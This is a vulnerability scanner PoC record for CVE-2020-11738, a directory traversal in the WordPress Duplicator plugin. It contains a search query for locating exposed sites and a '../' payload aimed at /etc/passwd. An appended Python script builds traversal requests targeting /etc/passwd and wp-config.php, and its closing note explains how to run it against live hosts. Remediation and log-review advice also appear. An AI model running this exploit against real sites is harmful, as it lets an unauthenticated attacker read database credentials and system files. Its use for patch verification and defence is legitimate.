{ "Name": "WordPress Duplicator 1.3.26 Arbitrary File Read (CVE-2020-11738)", "Description": "
Duplicator is a migration plugin for WordPress.
The Snap Creek Duplicator plugin before 1.3.28 for WordPress (and Duplicator Pro before 3.8.7.1) allows Directory Traversal via ../ in the file parameter to duplicator_download or duplicator_init.
", "Product": "Duplicator", "Homepage": "https://wordpress.org/plugins/duplicator/", "DisclosureDate": "2021-10-06", "Author": "1291904552@qq.com", "FofaQuery": "app=\"WordPress\" && body=\"Duplicator\"", "GobyQuery": "app=\"WordPress\" && body=\"Duplicator\"", "Level": "2", "Impact": "The Snap Creek Duplicator plugin before 1.3.28 for WordPress (and Duplicator Pro before 3.8.7.1) allows directory traversal via ../ in the file parameter to duplicator_download or duplicator_init. An unauthenticated remote attacker can read any file the web server process can read, including wp-config.php, and so obtain database credentials and other configuration secrets.
", "Recommendation": "The vendor has released a fixed version; upgrade Duplicator to 1.3.28 or later (Duplicator Pro to 3.8.7.1 or later): https://wordpress.org/plugins/duplicator
1. Until the upgrade is applied, restrict access to the plugin's duplicator_download and duplicator_init actions with a firewall or WAF allow-list.
2. Review web server access logs for requests carrying ../ (or its URL-encoded forms) in the file parameter of those actions, and rotate the secrets in wp-config.php if any such request succeeded.
", "Translation": { "CN": { "Name": "WordPress plugin Duplicator arbitrary file read vulnerability (CVE-2020-11738)", "VulType": ["File read"], "Tags": ["File read"], "Description": "Duplicator is a migration plugin for WordPress.
The Snap Creek Duplicator plugin before 1.3.28 for WordPress (and Duplicator Pro before 3.8.7.1) allows directory traversal via ../ in the file parameter to duplicator_download or duplicator_init; an attacker can obtain sensitive information such as configuration files.
", "Impact": "The Snap Creek Duplicator plugin before 1.3.28 for WordPress (and Duplicator Pro before 3.8.7.1) allows directory traversal via ../ in the file parameter to duplicator_download or duplicator_init; an attacker can obtain sensitive information such as configuration files.
", "Product": "Duplicator", "Recommendation": "The vendor has released a fixed version; upgrade Duplicator to 1.3.28 or later (Duplicator Pro to 3.8.7.1 or later): https://wordpress.org/plugins/duplicator
1. Until the upgrade is applied, restrict access to the plugin's duplicator_download and duplicator_init actions with a firewall or WAF allow-list.
2. Review web server access logs for requests carrying ../ (or its URL-encoded forms) in the file parameter of those actions, and rotate the secrets in wp-config.php if any such request succeeded.
" }, "EN": { "Name": "WordPress Duplicator 1.3.26 Arbitrary File Read (CVE-2020-11738)", "VulType": ["fileread"], "Tags": ["fileread"], "Description": "Duplicator is a migration plugin for WordPress.
The Snap Creek Duplicator plugin before 1.3.28 for WordPress (and Duplicator Pro before 3.8.7.1) allows directory traversal via ../ in the file parameter to duplicator_download or duplicator_init.
", "Impact": "The Snap Creek Duplicator plugin before 1.3.28 for WordPress (and Duplicator Pro before 3.8.7.1) allows directory traversal via ../ in the file parameter to duplicator_download or duplicator_init. An unauthenticated remote attacker can read any file the web server process can read, including wp-config.php, and so obtain database credentials and other configuration secrets.
", "Product": "Duplicator", "Recommendation": "The vendor has released a fixed version; upgrade Duplicator to 1.3.28 or later (Duplicator Pro to 3.8.7.1 or later): https://wordpress.org/plugins/duplicator
1. Until the upgrade is applied, restrict access to the plugin's duplicator_download and duplicator_init actions with a firewall or WAF allow-list.
2. Review web server access logs for requests carrying ../ (or its URL-encoded forms) in the file parameter of those actions, and rotate the secrets in wp-config.php if any such request succeeded.
" } }, "References": [ "https://nvd.nist.gov/vuln/detail/CVE-2020-11738" ], "HasExp": true, "ExpParams": [ { "name": "filepath", "type": "input", "value": "../../../../../../../../../etc/passwd" } ], "ExpTips": null, "ScanSteps": null, "ExploitSteps": null, "Tags": [ "fileread" ], "VulType": ["fileread"], "CVEIDs": ["CVE-2020-11738"], "CVSSScore": "7.5", "AttackSurfaces": { "Application": ["Duplicator"], "Support": null, "Service": null, "System": null, "Hardware": null } }
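Worked check for the traversal described in this PoC, added here as an example; it is not code from the Goby PoC or from the Duplicator plugin. It builds the request the description implies (the file parameter of the duplicator_download action, default payload matching the ExpParams above, duplicator_init selectable via the action argument) and classifies a response body offline. It assumes the actions are dispatched through WordPress's standard AJAX entry point, wp-admin/admin-ajax.php; the `fetch` callable, the `SIGNATURES` table, the sample bodies and all helper names are this example's own, and the sample responses are constructed, not captured from a real host.

```python
"""Added example: build a CVE-2020-11738 traversal request and classify the reply.

Not part of the Goby PoC or the Duplicator plugin. Network access is injected
via a fetch(url) -> str callable so the module runs offline against the
constructed samples below.
"""
import re
from urllib.parse import urlencode, urljoin

# Assumption: duplicator_download / duplicator_init are reached through the
# standard WordPress AJAX dispatcher.
AJAX_PATH = "wp-admin/admin-ajax.php"

# A successful read returns raw file contents; a patched plugin returns an
# error page or an empty body.  The /etc/passwd signature is what the PoC's
# default ExpParams targets; wp-config.php is the usual high-value target.
SIGNATURES = [
    ("/etc/passwd", re.compile(r"^root:[^:\n]*:0:0:", re.M)),
    ("wp-config.php", re.compile(r'''define\(\s*["']DB_(NAME|USER|PASSWORD|HOST)["']''')),
]


def traversal_payload(target, depth=9):
    """'../' repeated depth times followed by the target path.

    depth=9 reproduces the PoC's default ../../../../../../../../../etc/passwd.
    """
    return "../" * depth + target.lstrip("/")


def build_url(base, filepath, action="duplicator_download"):
    """GET URL for the vulnerable action with filepath in the file parameter.

    action may be 'duplicator_init', the other affected handler.
    """
    if not base.endswith("/"):
        base += "/"
    query = urlencode({"action": action, "file": filepath})
    return urljoin(base, AJAX_PATH) + "?" + query


def classify(body):
    """Return the name of the file whose signature matched, or None."""
    for name, pattern in SIGNATURES:
        if pattern.search(body):
            return name
    return None


def check_target(base, target, fetch, depth=9, action="duplicator_download"):
    """Send one traversal request via fetch(url) and return (url, matched_file)."""
    url = build_url(base, traversal_payload(target, depth), action)
    return url, classify(fetch(url))


# Constructed sample bodies (not captured traffic) so the check runs offline.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
)
SAMPLE_WPCONFIG = "<?php\ndefine( 'DB_NAME', 'wp' );\ndefine( 'DB_PASSWORD', 's3cret' );\n"
SAMPLE_PATCHED = "<html><body>Error: invalid file</body></html>"


if __name__ == "__main__":
    # Stand-in for a real HTTP client: a vulnerable host would hand back the file.
    url, hit = check_target("https://wp.example", "/etc/passwd", lambda u: SAMPLE_PASSWD)
    print(url)
    print("vulnerable, read" if hit else "not vulnerable", hit or "")
    _, hit = check_target("https://wp.example", "/etc/passwd", lambda u: SAMPLE_PATCHED)
    print("patched host:", hit)
```

To run it against a host, pass a real client as `fetch` (for example a function returning `requests.get(url, timeout=10).text`) and try both actions; a body that matches neither signature does not prove the host is patched, it only shows that this particular file was not returned.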